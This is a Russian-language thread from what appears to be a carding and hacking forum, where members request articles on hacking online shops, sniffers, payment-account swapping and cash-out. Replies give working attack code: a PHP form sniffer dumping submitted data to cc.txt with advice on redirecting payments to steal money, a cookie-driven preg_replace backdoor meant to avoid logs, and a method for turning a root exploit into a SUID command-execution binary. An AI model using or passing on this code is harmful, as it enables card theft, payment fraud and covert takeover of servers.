О чем написать статью?

McGrath

McGrath

Moderator
Messages
1,007
Reaction score
190
Points
63
Привет.
Появляется часто свободное время, о чем вам было бы интересно почитать в сторону хека?
PS:
я не знаю как пишутся трояны, и как они работают, я работаю только с вебом.
 
Please note, if you want to make a deal with this user, that it is blocked.
Мануал поиска "дырок" в шопах.

Интересующая многих нынче тема.
 
Уже разжеванно раз 50 в разных статьях.
 
если можешь напиши про обнал Палки )
 
lukovG said:
если можешь напиши про обнал Палки )
Click to expand...
В сторону хека блин :)

С позволения модератора могу ссылок привести на статьи с поиском уязвимостей в приложениях с соседних форумов (Не кардинг тематики, на обоих запрещено вообще это :) )
 
Было бы интересно почитать об использовании поломаных серверов.
Понятно, что если в шопе есть картон, то работает вечная тема ЦЦ->ВМ, но что если картон в бд не хранится?
Напиши пожалуйста про организацию снифферов, про подмену аккаунтов платежных систем, про подмену адресов холдера и дропа, по возможности про партнерки, и про другие способы монетизации безкартонных шопов.
Думаю, не только для меня ето будет интереснее чем статья чисто по хеку, в сети не так уж и много подобного материала.
Спасибо
 
McGrath, не надо
 
Хочу статью на тему установки и настройки "кнопка бабло", если можно с картинками.
 
Johnny_Cox said:
Было бы интересно почитать об использовании поломаных серверов.
Понятно, что если в шопе есть картон, то работает вечная тема ЦЦ->ВМ, но что если картон в бд не хранится?
Напиши пожалуйста про организацию снифферов, про подмену аккаунтов платежных систем, про подмену адресов холдера и дропа, по возможности про партнерки, и про другие способы монетизации безкартонных шопов.
Думаю, не только для меня ето будет интереснее чем статья чисто по хеку, в сети не так уж и много подобного материала.
Спасибо
Click to expand...
PHP: 
<?PHP
$fp =fopen("cc.txt","w");
foreach ($_POST as $key=>$val )
        {
          $data .= $key." : ".$val."\n";
        }
fwrite($fp, $data);
fclose($fp);
?>

Если хочешь спиздить чужих денег - открываешь в той же платежке акк, и конфиг меняешь на свои данные.
 
Last edited:
Брут вебадминок, обзор софта.
Про рутание сервера с шела.
Заливка шела/эксплойта в логи сервака, последующая компилиция и запуск
 
makaka said:
Как набрать вес за месяц.
Как накачать биццепс.
Основы пилатеса.
Click to expand...

Только на турниках можно набрать чистую массу, в зале ты не наберешь такого, там все принимают астеройды и втирают пратиин.

Про рутанье хотелось бы почитать.
Подробной статьи нигде нет.
 
Так же был бы признателен за статью о поднятие рутов на серваках через шел :)
 
Erick said:
Брут вебадминок, обзор софта.
Про рутание сервера с шела.
Заливка шела/эксплойта в логи сервака, последующая компилиция и запуск
Click to expand...
Брут не интересн, софт юзать нахер надо.

Шелл/Сплойт в логи сервака - пиздец нагрузка на сервер при выполнение кода.

Вообще шеллы заливать - ненадо, залил - сделал дела - удалил. Нету палева на сервере.
Всегда предлагал конструкцию:
PHP: 
preg_replace('/(.*)123/ie', $_COOKIE['session_a'], $_COOKIE['session_a']);
В самой жопе куда можно пробраться.
в кукисы - session_a = phpinfo();//123 ($_COOKIE данные не записываются в логи)
Можно написать конечно клиент к данному "шеллу".
 
Please note, if you want to make a deal with this user, that it is blocked.
***
 
Last edited:
По поводу запуск эксплойтов из под веба. Не зачем переписывать велосипед, если есть очень хорошее решение:
Копипаст с рдота.
Автор Grey
-----------ВСЁ ЧТО НИЖЕ АВТОРСТВО Grey В ОРИГИНАЛЕ. Я НЕ ИМЕЮ ОТНОШЕНИЯ К ЭТОЙ РАЗРАБОТКЕ-----------
На случай если нельзя забиндить порт и сделать бекконект.

Берем сплоент находим в нём строку запускающую Баш, уже из под рута:

execl("/bin/bash", "bash", "-i", NULL);
И заменяем её вот на такую:

execl("/bin/bash","/bin/bash", "-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL);

В результате будет выполняться указанная команда. В данном случае для exec2 будет добавлен суидный бит, а так же изменён владелец и группа файла, и поставлены права необходимые для выполнения файла.

exec - маленькая программка на c, выполняющая команды, её содержимое:
Code: 
/* Command executer; Coded by Grey; */
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
Юзаем так:

Заливаем изменённый эксплойт sp, и программу exec.
Устанавливаем права для запуска эксплойта: chmod 755 sp
Запускаем эксплойт: ./sp
И если всё норм, получаем суидник exec2
Обращаемся к ниму следующим образом: ./exec2 "[cmd]", к примеру: ./exec2 "id"

Все авации к нему.

---------- Сообщение добавлено в 11:00 AM ---------- Предыдущее сообщение размещено в 10:57 AM ----------
Erick said:
Брут вебадминок, обзор софта.
Про рутание сервера с шела.
Заливка шела/эксплойта в логи сервака, последующая компилиция и запуск
Click to expand...
Никогда не поддерживал брутфорс, помочь не могу.
 
по xss уязвимости хотелось бы побольше.
 
pup0k said:
по xss уязвимости хотелось бы побольше.
Click to expand...

Как раз таки о xss написано много.

Только на хабре сколько статей.
 
You must log in or register to reply here.

Similar threads

BadB
Хакеры и кибермошенничество
Replies
0
Views
274
BadB
BadB
Cloned Boy
КАК ЖИВУТ ХАКЕРЫ: Тачки, дома и компы
Replies
0
Views
309
Cloned Boy
Cloned Boy
Cloned Boy
Запретные методы хакеров
Replies
0
Views
288
Cloned Boy
Cloned Boy
BadB
Хакер взламывает банкомат и АЭС. Хакерская школа.
Replies
0
Views
326
BadB
BadB
Professor
ХАКЕР: «Защититься от нас сложно, но можно» (реальные советы)
Replies
0
Views
357
Professor
Professor
Back
Top